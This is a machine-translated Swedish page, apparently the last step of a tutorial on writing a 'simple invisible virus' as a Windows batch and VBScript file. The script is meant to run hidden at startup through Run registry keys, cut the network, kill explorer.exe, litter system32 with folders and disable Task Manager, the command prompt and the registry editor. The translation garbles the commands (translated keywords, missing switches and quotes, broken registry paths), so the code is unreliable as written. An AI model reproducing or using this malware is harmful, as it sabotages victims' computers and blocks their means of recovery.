Enkel virus som körs osynligt (4 / 4 steg)
Steg 4: Final arkivera
Nu då, din slutliga komplett kommandofil bör se ut ungefär som den nedan. Också, vad denna fil kommer att göra, glömde nästan att en del, lol. Det kommer att inaktivera internet och avsluta explorer.exe när datorn startar. Det skapas också en massa random filer i systemkatalogen 32. Det kommer att inaktivera den Task manager, kommandotolken och registren redaktör.utanför
gå till processen
CreateObject("Wscript.Shell"). Kör "" "& WScript.Arguments(0) &" "", 0, falska
: process
Skriv run.bat | hitta "CreateObject" | hitta /v "typ" > invis.vbs
CD %windir%\system32
ECHO wscript.exe "C:\windows\system32\invis.vbs" "Data_exe.bat" > Data_exe.bat
ECHO off > Data.bat
ECHO ipconfig/release >> Data.bat
ECHO taskkill explorer.exe >> Data.bat
ECHO mkdir %% slumpmässiga %% >> Data.bat
ECHO mkdir %% slumpmässiga %% >> Data.bat
reg tillägga "HKCU\software\microsoft\windows\currentversion\run" v säkerhet /t reg_sz d "% windir%\system32\Data_exe.bat" f
reg tillägga "HKLM\software\microsoft\windows\currentversion\run" v säkerhet /t reg_sz d "% windir%\system32\Data_exet" f
reg tillägga "HKLM\Software\Policies\Microsoft\Windows\System v DisableCMD/t REG_DWORD d 2 f
reg tillägga "HKCU\Software\Policies\Microsoft\Windows\System v DisableCMD/t REG_DWORD d 2 f
reg tillägga "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem\\\ v DisableTaskMgr/t REG_DWORD d 1 f
reg tillägga "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem\\\\\ /v DisableTaskMgr t REG_DWORD d 1 f
reg tillägga "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem\\\ v DisableRegistryTools/t REG_DWORD d 1 f
reg tillägga "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem\\\\\ /v DisableRegistryTools t REG_DWORD d 1 f